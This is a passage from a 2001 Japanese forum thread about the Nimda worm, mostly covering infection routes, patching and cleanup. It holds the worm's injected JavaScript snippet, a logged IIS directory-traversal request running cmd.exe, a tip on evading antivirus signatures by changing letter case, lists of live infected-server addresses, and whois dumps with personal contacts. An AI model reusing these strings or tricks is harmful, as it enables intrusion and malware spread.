ローカルで安全確認するのに必要だったんだよね。

144 :名無しさん@お腹いっぱい。:01/09/20 22:52
社内LANでの感染、強力です。
共有フォルダ設定は全て切っておいたほうが安全?

145 :名無しさん:01/09/20 22:55
>>144
共有は切るべき。
うちの会社も復旧したと思ったら、
本社で再発してLAN設定変更通達がまた来た。
うちの部署は被害ゼロなのに迷惑なばかりだ。
感染したトコのディレクトリ覗いたら
*.emlが大量にあった。。。怖かった

146 :ピンコ勃ち:01/09/20 22:56
>>136
> のーとん先生はいつ無償ツール出るんだろうね・・。

立場上、それをチェックしなきゃいけなくて追ってるんだけど、
米サイト
http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html
が、

Note: Once a computer has been attacked by W32.Nimda.A@mm,
it is very difficult to determine what security settings have been compromised.
Unless - by reading the logs - you can be absolutely sure
that nothing else malicious has been done to the computer,
it may be best to completely reinstall the system.
This is the only way you can be 100 percent certain
that the computer is clean.

こんなこと言っちゃってるからねえ・・・。>先生
まあ、そうなんだろうけど。

これってやっぱりお手上げ宣言?

147 :名無しさん@お腹いっぱい。:01/09/20 22:58
>>144
あとできればOutlookとIEのバージョン確認。

148 :ピンコ勃ち:01/09/20 23:04
>>144
> 社内LANでの感染、強力です。

まったくで。(T_T)
なんだか徹夜2晩目になりそうな勢いっす。
これだから小回りの利かない大企業はヤなんだよぶつぶつ。

でさ、Win系はどうにかなったんだけど(たぶん)、
ファイルサーバーになってる NetWare がどうしようもない。
基幹業務が NetWare を使うんで切るわけにも逝かないし、
かといって、対策漏れの PC から変なファイル作られてもアレだし。
こんなに PC やらサーバーやらがあんのに、
Personal なノートン先生だけで運用してんだもんなあ。
って、こういう目に遭わなきゃ検討もしないのはわかるんだけどね。

どーにもこーにも徹夜は止まらないっす。(T_T)

149 :質問です。:01/09/20 23:06
僕はIE4.01SP2を使っています。
OutlookExpressは、4.72.3612.1700です。

感染の可能性はあるんでしょうか?

150 :名無しさん@お腹いっぱい。:01/09/20 23:07
Nimdaの勢いはすごいね。
我がApacheサーバーへのアタック件数は、19日の10時以降で
約14,000件
うち 61.xxx.xxx.xxx   から 9,900件
   JPドメイン          3,800件 

61.xxx.xxx.xxx は、韓国、台湾かな? なんとかしてくれ・・・

code redは、1日150件ほどだったから、ネットワークへの負荷は、とんでもなく大きくなっているのだろうか

151 :名無しさん@お腹いっぱい。:01/09/20 23:09
現在わかっている感染経路は
・メールによる感染
・ブラウザによる感染
・共有による感染
・CoderedIIでバックドアがある場合のFTPによる感染
この4つかな?他にもあるかい?

152 :名無しさん@お腹いっぱい。:01/09/20 23:11
>>149

大アリってことでよいですか?>>83

153 :名無しさん@お腹いっぱい。:01/09/20 23:14
>>151

感染じゃないけど、アカウント勝手に増やされるよねえ。

いわばフロントドアオープンなんだけど、これを実際になにかされた例ってあるんだろうか?

や、だれでもtelnetでログオンできるんだから感染でもなんでもできるだろうが・・。

154 :名無しさん@お腹いっぱい。:01/09/20 23:14
>>142のページのソースには例のJavaScriptは見つからないな。
それよりも</HTML>が見当たらないぞ!

155 :名無しさん@お腹いっぱい。:01/09/20 23:19
IEでjavaスクリプトを切る、セキュリティレベルを上げるということだけでは、
必ずしも安全ではないらしいね。

156 : :01/09/20 23:27
攻撃を仕掛けてきたIPアドレスに対して、
「ネットワークドライブの割り当て」で
\\IPアドレス\c$
で共有すると、、、、、

157 :名無しさん@お腹いっぱい。:01/09/20 23:30
>>155
ニムダでは使われなかったけど、プライスロトのページ改変で使われた
のけぞるセキュリティホールがある。
ページ見るだけで再起動不可になる。
http://www.microsoft.com/japan/technet/security/msvm.asp

>>153
アカウントの追加でIISの無いクライアントも公開サーバーにしてしまおう
という事なんだろうけど、目的はわからないなー。

158 :ん〜ま:01/09/20 23:31
linuxなのだが試しに、ダミーのroot.exeとか置いたらアクセスが増えてしまったw

159 :名無しさん@お腹いっぱい。:01/09/20 23:33
>>158
root.exeかcmd.exeがあるとFTPでadmin.dll置こうとするでしょ。

160 :名無しさん@お腹いっぱい。:01/09/20 23:34
>>156
その後、どうなんの?
教えてちょ。眠れんがな。

161 :名無しさん@お腹いっぱい。:01/09/20 23:39
(9/19)内閣LANもウイルスNimdaに汚染
(9/19)新種コンピューターウイルス「ニムダ」が猛威
(9/19)ウイルス被害15カ国で確認・HP開くだけで感染も
(9/19)新種ウイルスの被害が拡大・共同通信や都留信組など
(9/19)農水省にもウイルス侵入
(9/19)5国立大でウイルス感染
(9/19)三重県庁もウイルスに感染
(9/19)岐阜県でもウイルス感染
(9/19)宮城県庁もウイルス感染
(9/19)茨城県庁もウイルスに汚染
http://it.nikkei.co.jp/it/sp9/sp9Ch.cfm?id=20010920p949k005_20

今回の騒動。
プロがかかわってないかい?

162 :名無しさん@お腹いっぱい。:01/09/20 23:40
>>157
>>>155
> ニムダでは使われなかったけど、プライスロトのページ改変で使われた
> のけぞるセキュリティホールがある。

すると近々これを利用したういるすが発生する可能性も・・。

163 :名無しさん@お腹いっぱい。:01/09/20 23:45
>>162
そう。
例えばニムダで改変されるページがこのセキュリティホールを利用したスクリプトに書き換えられると
アクセスしてきたゲストのレジストリの変更が思いのままにできてしまう。

164 :名無しさん@お腹いっぱい。:01/09/20 23:48
ネットワークをadmin?
テロと直接関係があるかはともかく、
明らかに意識したネーミングだよねー。。。

165 :名無しさん@お腹いっぱい。:01/09/20 23:50
イスラエルの武器メーカがNimdaという名前だといった記事がどっかにあったが、
これってデマ?

166 :名無しさん@お腹いっぱい。:01/09/20 23:53
こんなの感染する奴がヴァカ。っつーか不用意。
自業自得のくせに被害者面するな。特に企業管理者。

167 :名無しさん@お腹いっぱい。:01/09/20 23:54
それにしても
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
の一行がわからん
なんで中国なんだ?(w

168 :名無しさん@お腹いっぱい。:01/09/20 23:56
>>163

これって実施されたとして、のーとんインターネットセキュリティーとかでブロックできる?
Winにパッチをあてるとかじゃなくて、水際作戦で。

169 :ん〜ま:01/09/20 23:57
手動で駆除は↓
http://www.caj.co.jp/tec/tec_n/f_nimda.htm

170 :名無しさん@お腹いっぱい。:01/09/20 23:58
>>166
ウイルスに感染するやつが悪い、というおまえの考え方はウイルス作ってばら撒く奴の
それに近い。

171 :おしえてクン:01/09/20 23:58
ねー
ヒュンダイjapan以外に感染中のサイトない?

172 :名無しさん@お腹いっぱい。:01/09/21 00:00
>>161
というか、感染したとこのネットワーク管理者がアマチュアだっただけでは。
省庁の場合一種の税金泥棒?

173 :163:01/09/21 00:01
>>168
プライスロト対策はされてるので似たような物だったら大丈夫だとは思うけど・・

174 :名無しさん@お腹いっぱい。:01/09/21 00:17
>>170
ウィルス作る奴が悪いと、努力や義務を放棄してるDQN管理者が市んでくれると助かる。

175 :名無しさん@お腹いっぱい。:01/09/21 00:25
>>171
>ねー
> ヒュンダイjapan以外に感染中のサイトない?

こことか?
http://www.cnet-try.ne.jp/f/fuji/index.htm

176 :名無しさん@お腹いっぱい。:01/09/21 00:25
>>174
俺、昔から国語の成績悪いんだけど。
誰か174の文章を分かりやすく解説してくれんか。

177 :かなり:01/09/21 00:27
>>176

激しく同意

174ってなにいいたいの???????ヴァカ

178 :名無しさんに接続中…:01/09/21 00:27
これからは、Webサーバはバーチャルホストオンリーで立てた
方がいいかもね。本ホスト(IPアドレスでアクセス出来る奴)は
アクセス制限掛けてダミーにして、IPアドレスではアクセス出来
ないようにする。
当然HTTP/1.1対応ブラウザじゃないとアクセス出来ないけど、
今ではほとんど問題ないしょ。
ワームはいやだけどWebサーバやりたい人は良い解決策かも・・

179 :名無しさん@お腹いっぱい。:01/09/21 00:33
>>176-177
「ウイルス制作者に被害の責任を押しつけ、
(パッチ導入やver.更新などの)保守保全作業を放棄するような管理者」
〜に、氏んでほしいということでは。

180 :名無しさん@お腹いっぱい。:01/09/21 00:39
>>179
ウィルス作る奴が悪いと言うばかりで、努力や義務を放棄してるDQN管理者が市んでくれると助かる。
と言う解釈で言い訳ね。

181 :179:01/09/21 00:41
>180
です。フォローさんくす。

182 :名無しさん@お腹いっぱい。:01/09/21 00:44
うちのNT4サーバー、MS推薦のパッチ2つあてても
ネットに繋げた瞬間に感染しちゃうんだけど、何で?
まだどこかに穴があいてる??

183 :名無しさん@お腹いっぱい。:01/09/21 00:45
root.exeが残ってるんだよ>182

184 :174の意訳:01/09/21 00:46
今回、ウイルスに感染されなかった俺様は偉い!
管理者なんて一生縁がないだろうが、やっぱり俺様は偉い!
近所の子供に指を指されて笑われても、主婦に避けられても、
やはり俺様は最高に偉い!!

185 :c:01/09/21 00:48
>>181
root.exeけせ、すぐに

186 :名無しさん@お腹いっぱい。:01/09/21 00:48
感染サイトじゃないけど

http://fuga.jp/~densuke/diary/?date=20010919#p10

187 :名無しさん@お腹いっぱい。:01/09/21 00:51
>>184
確かにそういうニュアンスを感じるな。

188 :名無しさん@お腹いっぱい。:01/09/21 00:53
>>183
root.exeのコピー元のシェルcmd.exeもニムダは探してる。
それもいろんなディレクトリで。
でレジストリが改変されたままだとFTPでニムダに感染したadmin.dllを送り付けてくる。

NTはサーバーのみで使ってる?クライアントも共用してたらニムダに感染する殆どの条件を持っている事になる。

189 :182:01/09/21 00:53
サーバ内にあるroot.exeを片っ端から検索・削除してしまえばいいのでしょうか?
MSADCとかInetPub以降にはいってました。
これって何のためモジュールなんでしょう?

190 :お勧めブラウザ設定:01/09/21 00:53
インターネットエクスプローラの場合。
ツール→インターネットオプション→セキュリティ→レベルのカスタマイズをクリックする。
Java、ActiveXと書いてあるところの設定は全て「無効」にする。
Cookieも無効にした方が安全。

ネットスケープの場合。
編集→設定→詳細→Javaと書いてあるところの設定は全てチェックを外す。
画像の自動読み込み、スタイルシートのチェックも外した方が、より安全である。

191 :名無しさん@お腹いっぱい。:01/09/21 00:54
パッチってのは健康なPCが感染しないようにするためのものだろう。
すでに発病してたら手遅れなんじゃないか。
あちこちいじられまくられて元に戻せない状態なのかもよ。

192 :名無しさん@お腹いっぱい。:01/09/21 00:54
朝日も?

http://www.asahi.com/information/info/0919marion.html

193 :名無しさん@お腹いっぱい。:01/09/21 00:55
>>189
なんのためのモジュールってあんたのマシンに
侵入していろいろ悪さするためのモジュールだYO

194 :名無しさん@お腹いっぱい。:01/09/21 00:55
なんか、ここで書き込んでから受信されるまでの時間が長いんだけど、
感染されているのかな?

195 ::01/09/21 00:56
>>189
ビンゴ
ワームの歴史を勉強してください

196 :名無しさん@お腹いっぱい。:01/09/21 00:56
>>191
同感だ。
もうあれこれいじりまわすより、データバックアップして素直に
クリーンインストールして、パッチ当てたほうが早いのでは?

197 :名無しさん@お腹いっぱい。:01/09/21 00:58
閉鎖されてるところがかなり多い。(記事のところは除いてね)

http://search.fresheye.com/?kw=readme%2eeml&term=weekly

が、復旧しても再感染するところもかなりありそうだ(w

198 :ニムダに感染したニダ。:01/09/21 01:01
ありゃまー。

http://www.hyundaijapan.co.jp/info/info.html

オールナイトこのまま?

199 :電算ウィルスニダ:01/09/21 01:02
電算ウィルスだって。(藁

電算ウィルス「ニムダ」に関するお知らせ
http://www.orico.co.jp/20010920.html

200 :名無しさん@お腹いっぱい。:01/09/21 01:03
>>197
昨日に比べて感染してると思われるサイトが少なくなったんだが、、
かなり対策が浸透してきたと思っていいのかなぁ。

201 :名無したんに接続中・・・:01/09/21 01:03
>>198
どうでもいいけど、不用意にリンク張るなって。

202 :182,189:01/09/21 01:03
とりあえずもう一度ワーム駆除してroot.exeを削除してみます・・・。
それでダメならクリーンインストールします。

203 :名無しさん@お腹いっぱい。:01/09/21 01:04
Load.exeをバイナリエディタで開いて
 <HTML>〜</HTML>
の間の文字を適当に大文字/小文字変換してみよう。
それだけで君も新ニムダの作者だ。

少なくとも
http://www.symantec.com/region/jp/sarcj/defs.download.html
の最新バージョンには引っかからなくなる。
(そんなチェックで良いのか?>Symantec)

204 :名無しさん@お腹いっぱい。:01/09/21 01:05
>>197
ニムダを退治してもCoderedの片鱗が残っていれば再感染する。
サーバーで使っている場合は両方をネットから隔離した状態で対処しなければならない。
かなり頭つかうぞ。

205 :名無しさん@お腹いっぱい。:01/09/21 01:06
>>202
このまま戦い続けて、”これが原因でした。”ていう報告聞きたい気もする。
ちなみに俺は優柔不断な196。

206 :182,189:01/09/21 01:08
>>205
ある意味、潔くて男らしいといえる。

207 :名無しさん@お腹いっぱい。:01/09/21 01:09
CodeRed、ニムダで作ったバックドアでどっかを一斉攻撃?

208 :名無しさん@お腹いっぱい。:01/09/21 01:11
>>190
でもOFFっちゃうとヤフオクとか困るしなぁ。
ダイアログ表示にしても面倒だし・・・

209 :e:01/09/21 01:12
root.exeはsadmindも作るからね、
けっこう残ってるとこ多いよ。
わかんない人はプロに頼んでね。

210 :名無しさん@お腹いっぱい。:01/09/21 01:12
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/
http://210.135.201.16/

211 :名無しさん@お腹いっぱい。:01/09/21 01:17
>>203
ダメじゃん・・・

212 :名無しさん@お腹いっぱい。:01/09/21 01:17
>>210
まあ落ち着け。

213 :名無しさん@お腹いっぱい。:01/09/21 01:17
210はNimdaに遭えるのか?

214 :名無しさん@お腹いっぱい。:01/09/21 01:23
lynx -source http://210.135.201.16/ | grep readme

<html>
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
</html>

215 :名無しさん@お腹いっぱい。:01/09/21 01:25
株式会社 まちづくり三鷹 (Mitaka Town Management Organisation)
SANRITSU-NET [210.135.201.0 <-> 210.135.201.31] 210.135.201.0/27
Parkcitynet(武蔵野三鷹ケーブルテレビ(株)) (Parkcitynet(MUSASINO-MITAKA CABLETELEVISION Inc.))
SUBA-134-003 [サブアロケーション] 210.135.201.0

216 :名無しさん@お腹いっぱい。:01/09/21 01:27
https://www.netsecurity.ne.jp/article/1/2851.html
すまん、"Guests and Administrators"ってあちこちで見かけるけど。
こんなグループあったっけか?
Symantecの解析のとこにも出てくるし・・・

217 :名無しさん@お腹いっぱい。:01/09/21 01:28
>210
http://210.135.201.16/
=MicrosoftR Windows NTR 4.0 Option Pack へようこそ
microsoft いったいどうなっているんだ!!

しっかり感染しているぞ。 メディア・プレイヤーが開いてしまった。

218 :名無しさん@お腹いっぱい。:01/09/21 01:29
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/
http://210.124.123.38/

219 :名無しさん@お腹いっぱい。:01/09/21 01:30
ウイルス作家から知識取ったら、コピペしか能のないこんな奴になるんだろうなぁ。

220 :無しさん@お腹:01/09/21 01:31
root.exe,って何?

221 :名無しさん@お腹いっぱい。:01/09/21 01:32
>>217
そこMSじゃないぞ。

222 :名無しさん@お腹いっぱい。:01/09/21 01:32
riched20.dllも書き換えられてるから再起動で再感染するぞ。
正常なマシンからコピーしてこないとだめだ。

223 :名無しさん@お腹いっぱい。:01/09/21 01:33
http://210.180.38.194/
http://210.180.38.194/
http://210.180.38.194/
http://210.180.38.194/
http://210.180.38.194/
http://210.180.38.194/
http://210.180.38.194/
http://210.180.38.194/
http://210.180.38.194/
http://210.180.38.194/

224 :名無しさん@お腹いっぱい。:01/09/21 01:33
inetnum: 210.124.0.0 - 210.127.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP

225 : :01/09/21 01:35
IE5.5SP2で安心してたけど、セキュリティーレベル設定してなかった・・・。
hyundaiのメールもらっちった。
readme.exeも・・・。

226 :名無しさん@お腹いっぱい。:01/09/21 01:38
http://210.12.193.252/

fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn

http://210.12.193.252/

fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn

http://210.12.193.252/

fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn

http://210.12.193.252/

fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn

http://210.12.193.252/

fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn

227 :名無しさん@お腹いっぱい。:01/09/21 01:40
>>216
https://www.netsecurity.ne.jp/article/1/2851.html

俺も不思議な部分を見つけた。
今までのログから推測するとCoderedのようなバッファオーバフロー攻撃はしていないような気がする。
同時にCoderedが感染しているのではないか?
9月30日にCoderedIIは永眠するからそれ以降バッファオーバーフロー攻撃が無くなれば
ニムダがこの攻撃方法を持っていないという事がわかると思う。

228 :名無しさん@お腹いっぱい。:01/09/21 01:40
>217のかた
かわいそうなMS
こりゃ恥ずかしいぞ,だれか停めにいってやってください。
:-) [01:34][/dev/pts/2]
[1001][lev@gateway ]$ nslookup 210.135.201.16
Server: 192.168.0.7
Address: 192.168.0.7#53

** server can't find 16.201.135.210.in-addr.arpa.: NXDOMAIN


:-) [01:34][/dev/pts/2]
[1002][lev@gateway ]$ dig 16.201.135.210.in-addr.arpa

; <<>> DiG 9.1.2 <<>> 16.201.135.210.in-addr.arpa
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;16.201.135.210.in-addr.arpa. IN A

;; ANSWER SECTION:
16.201.135.210.in-addr.arpa. 77948 IN CNAME 16.0/27.201.135.210.in-addr.arpa.
;; AUTHORITY SECTION:
0/27.201.135.210.in-addr.arpa. 2348 IN SOA kiwi05.mitaka.ne.jp. postmaster.mitaka.ne.jp. 2820191316 7200 1800 1209600 86400

;; Query time: 4 msec
;; SERVER: 192.168.0.7#53(192.168.0.7)
;; WHEN: Fri Sep 21 01:35:15 2001
;; MSG SIZE rcvd: 133


:-) [01:35][/dev/pts/2]
[1003][lev@gateway ]$ whois kiwi05.mitaka.ne.jp.
[whois.internic.net]
[redirected to whois.discount-domain.com]

DRS Whois Server V 1.0.1 (Reacto.COM Ltd)

Domain "KIWI05.MITAKA.NE.JP." is not answered by this whois server.

:-) [01:35][/dev/pts/2]
[1004][lev@gateway ]$ whois kiwi05.mitaka.ne.jp
[cached]
[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Host Information: [ホスト情報]
a. [ホスト名] kiwi05.mitaka.ne.jp
b. [IPアドレス] 210.135.203.2
n. [技術連絡担当者] MU659JP
y. [通知アドレス] matikou@mitaka.ne.jp
[最終更新] 2000/03/14 10:34:06 (JST)
matikou@parkcity.ne.jp

229 :名無しさん@お腹いっぱい。:01/09/21 01:43
http://210.110.148.141/
http://210.110.148.141/
http://210.110.148.141/
http://210.110.148.141/
http://210.110.148.141/

230 :名無しさん@お腹いっぱい。:01/09/21 01:44
うちのADMIN、ワクチンソフトが出回ってないとき、
真っ先にMIMEタイプからWAVを削除しろっていってたん
だけどこの対応って正しかったのかな?

231 :名無しさん@お腹いっぱい。:01/09/21 01:53
>229
http://210.110.148.141/
# ENGLISH

IP Address : 210.110.144.0-210.110.159.255
Network Name : TITNET
Connect ISP Name : KREONET
Connect Date : 19970818
Registration Date : 20000606

[ Organization Information ]
Orgnization ID : ORG101373
Org Name : Tongmyong University of Information Technology
State : PUSAN
Address : 535 Yongdang-dong Nam-gu
Zip Code : 608-711

[ Admin Contact Information]
Name : Jungkun Kim
Org Name : Tongmyong University of Information Technology
State : PUSAN
Address : 535 bun-ji Yongdang-dong nam-ku
Zip Code : 608-711
Phone : +82-51-629-7263
Fax : +82-51-627-8362
E-Mail : jkkim@tmic.tit.ac.kr

[ Technical Contact Information ]
Name : Guenwoo Gim
Org Name : Tongmyong University of Information Technology
State : PUSAN
Address : 535 bun-ji Yongdang-dong nam-ku
Zip Code : 608-711
Phone : +82-51-629-7263
Fax : +82-51-627-8362
E-Mail : Gim@tmic.tit.ac.kr

232 :名無しさん@お腹いっぱい。:01/09/21 01:56
>>230
複数の感染方法の一つには有効だったのかもしれないけど
この手の情報は常に最新情報を追うのが酔いと思う。

233 :名無しさん@お腹いっぱい。:01/09/21 02:00
ウチは幸いまぬがれた。
知識として教えて欲しいんだけど、もし感染されたIISがみつかったら
駆除ツールとかでキレイにして、riched20.dllを正常なヤツからコピーして、
HDDに蠢くroot.exeをかたっぱしに削除して、MS製セキュリティパッチ2つを
あれてばオッケー?
もちろんCodeRedも駆除してあるとして。

234 :名無しさん@お腹いっぱい。:01/09/21 02:02
>>233
勝手にされてる共有も外さないとダメじゃないかな。
でも、基本はクリーンインストールでやりなおし。

235 :名無しさん@お腹いっぱい。:01/09/21 02:04
>>233
 NT:SP6a → SRP → IIS4.0累積パッチ
 2000:SP2 → IIS5.0累積パッチ
で解決。

236 :名無しさん@お腹いっぱい。:01/09/21 02:07
>>233
環境や感染経路によって状態が少しずつ違っているかもしれない。
現時点ではネットワークからは切り離した状態でクリーンインストール&パッチ当てが一番確実と思う。

237 :名無しさん@お腹いっぱい。:01/09/21 02:13
警告した後、アクセスペースが2倍増しになってしまった(泣)

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.161.236.176/28
b. [ネットワーク名] NDK-NET
f. [組織名] 株式会社日電工
g. [Organization] NICHIDENKO co.,ltd.
m. [運用責任者] SM3302JP
n. [技術連絡担当者] HS1449JP
y. [通知アドレス]
[割当年月日] 2000/10/11
[返却年月日]
[最終更新] 2000/10/11 14:12:39 (JST)
ip-alloc@nic.ad.jp

つーか、いい加減にしてくれドキュソ企業

238 :名無しさん@お腹いっぱい。:01/09/21 02:16
>>234-236
さんくす。
SP6aもSP5+IE5.01sp1とかだと暗号化レベルの関係で
入れるの面倒そうだなー。
C$とかのデフォ共有はそのままでいいの?

239 :名無しさん@お腹いっぱい。:01/09/21 02:16
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/

240 :名無しさん@お腹いっぱい。:01/09/21 02:18
http://210.220.111.217/
http://210.220.111.217/
http://210.220.111.217/
http://210.220.111.217/
http://210.220.111.217/
http://210.220.111.217/
http://210.220.111.217/
http://210.220.111.217/
http://210.220.111.217/
http://210.220.111.217/

241 :名無しさん@お腹いっぱい。:01/09/21 02:20
>>238
それが大問題なの。クライアントから共有でコピされるとまずいわけで。
面倒くさいけどパーテーション切ってドライブ構成変えて置く方がいいのかもしれない。

242 :名無しさん@お腹いっぱい。:01/09/21 02:28
http://165.76.121.44/

243 :241:01/09/21 02:32
どっち道共有するとコピはされるか。
コピは我慢する・・・実行さえしなければ・・・
厄介だ。

244 :名無しさん@お腹いっぱい。:01/09/21 02:39
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html
symantecのページ更新されてたね。下記のような記述があるんだけど、
「WINZIP32.EXEを除くすべての.EXEファイルはワームに感染し」
これってウィルス除去ソフトで回復できるもんなの?
出来るとしてもEXE書き換えられたら信頼性ないんすけど。

245 :名無しさん@お腹いっぱい。:01/09/21 02:40
>>235
「IIS経由での新たな感染を防ぐのは」だな。

マイクロソフトネットワーク経由の感染もどき(ファイルコピー)を塞ぐには共有を片っ端から厳しくするしかない。
( C$に限らず、とにかく書けるフォルダにはすべて書き込まれるのだから)

ブラウザ経由の感染を防ぐには IE5.01SP2 or IE5.5SP2(IE6では不十分との噂)
メールOutlook(Express)での感染を防ぐのは IEの SP2で同時に直るはず。


あとは、ウイルス検知ソフトでリアルタイムの書き込みチェックをOKにしておくべきだと思う。
ただ、パターンは常に最新にする必要がある(それでも今回のは当初見逃したらしい)

246 : :01/09/21 02:47
>>245
当初というか・・・ウィルス見つかってから定義を更新するまでのタイムラグくらいだろ。
「IE6では不十分との噂」のソースほしい

247 :名無しさん@お腹いっぱい。:01/09/21 02:48
つまりリアルタイムにはじく仕組みをしないと
コピー(admin.dll?)は免れない?

「C$」「D$」って共有のアクセス権限変えられるんでしたっけ?

248 :名無しさん@お腹いっぱい。:01/09/21 02:51
うちに出入りしてる業者は感染→>>233で満足げに帰っていったが・・・。
今後はコピーされまくりになるってことか??

249 :248:01/09/21 02:52
>>233>>235だった。ごめん。

250 :名無しさん@お腹いっぱい。:01/09/21 02:54
>246
http://memo.st.ryukoku.ac.jp/archive/200109.month/1291.html

251 :名無しさん@お腹いっぱい。:01/09/21 03:00
>>250
こっちの方が良いかも
http://memo.st.ryukoku.ac.jp/archive/200109.month/1262.html

252 :名無しさん@お腹いっぱい。:01/09/21 03:00
IEエラーIEエラー
で何もできなくなった

253 :名無しさん@お腹いっぱい。:01/09/21 03:03
全ディレクトリにreadme.exeのダミーを置いて属性変えとく。
あー疲れてる。

254 :名無しさん@お腹いっぱい。:01/09/21 03:04
明日は良い事あるさ・・・

255 :名無しさん@お腹いっぱい。:01/09/21 03:06
>>245
IE / Outlookでの感染を防ぐといっても
それ以外のバージョンでは「無条件に感染していた」ものを、
「実行するか/ダウンロードするか聞いてくるようになった」というだけなんだな。
それで実行しちゃえばやっぱり感染する。

256 :名無しさん@お腹いっぱい。:01/09/21 03:08
>>246

203が言っているのは本当みたい。
ちょっとずつ書き換えたファイルが出回ると、タイムラグだけが問題じゃなくなるかもしれん。

257 :246:01/09/21 03:10
>>256
確かに・・・
要するに、ウィルスチェックソフトに頼りすぎない方がいいってことだなサンクス

258 :名無しさん@お腹いっぱい。:01/09/21 03:11
>>256
ワーム以外の書き換えは人為的と見て死刑で処理。

259 :名無しさん@お腹いっぱい。:01/09/21 03:15
>>258
そういや、このワーム。
Copyright付いてたっけ(ワラ

http://www.nai.com/japan/virusinfo/nimdatmp.asp

260 :名無しさん@お腹いっぱい。:01/09/21 03:24
うちはコードレッド騒ぎの時にSRP導入したから大丈夫ダターヨヽ(´ー`)ノ

261 :名無しさん@お腹いっぱい。:01/09/21 03:27
>>260
パッチにもあてる順番があって、間違ってると前のが取り消されたりするらしいんだけど。
SRPのあとに IIS累積あて直した?
(ただ、IISのログに 200が無ければ OKは OKと見るべきなのか?)

262 :名無しさん@お腹いっぱい。:01/09/21 03:47
http://www.cnet-try.ne.jp/

ここのプロバイダの下のメンバーページ、全部引っかかってます。
しかも、2重に(w

263 :名無し:01/09/21 03:51
厨房な質問ですみません。ニムだにやられちゃったんですけどMCAFEEで駆除用DLしたものの説明の意味が解らず困ってます。スキャン対象のディレクトリってどこなんでしょう?マジ厨房でスマソ。誰か教えて下さい

264 :名無したんに接続中・・・:01/09/21 03:51
>>262
だから、不用意にリンク張るなって
せめて「tp://****」の状態で

265 :名無しさん@お腹いっぱい。:01/09/21 03:53
>>261
今回の奴はSRPに含まれているから、特に入れる必要は無いと思う。
入れるなら
SP6a>SRP>累積パッケージ>その他の修正パッチ
で良いのではないでしょうか。

266 :これだけ200が出る:01/09/21 03:55
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir

267 :名無しさん@お腹いっぱい。:01/09/21 04:03
>>263
トレンドマイクロ社の駆除ツールのほうが初心者向けだから、こちらを試してみ。
http://www.trendmicro.co.jp/nimda/

268 :Nimda ワーム に関する情報:01/09/21 04:10
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

269 :名無し:01/09/21 04:17
<267    ありがとうございます。逝ってきます。

270 :-:01/09/21 04:20
モロ、無修正画像サイト発見!

http://www.sex-jp.net/dh/01/
http://www.sex-jp.net/dh/02/
http://www.sex-jp.net/dh/03/
http://www.sex-jp.net/dh/04/

271 :名無しさん@お腹いっぱい。:01/09/21 04:39
IISの穴ついた方法と、emlファイルでの感染方法との2つがあるのは、わかるけど、emlファイル経由で感染した場合クライアントの違いによるワームの挙動の違いってどっかに書いてある?

つーか、トレンドマイクロとかのHPみるとeml経由の感染は9x系が前提で説明されてるけど(path構成とかsystem.iniが書き換えられるとか)2kとかNTで感染するとどうなんの?

272 :名無し:01/09/21 04:53
263の厨房です。267さんにせっかく教えて頂いたのにパソが固まる、というか急に画面が変になった後、真っ黒になって強制終了せざるを得なくなるの繰り返しでホムペまでたどり着けません(泣)こーゆー場合どうすればいいんでしょう?度々、厨房ですみません、、

273 :271:01/09/21 04:53
書いてあるか、、、。
でも、わかりずれぇ

274 :名無しさん@お腹いっぱい。:01/09/21 05:34
http://www.apnic.net/
ここってどんなサイトなんですか?和訳ソフトで調べても理解できませ
んでした...

前にトロイの木馬とかポートスキャンでノートンが反応するのでフィル
ターをかけたら、最近なのかニムダなのかわからないのですが、ルータ
ーのログ見ると数秒おきにフィルターにかかるようです。
TCPポート:80とか113

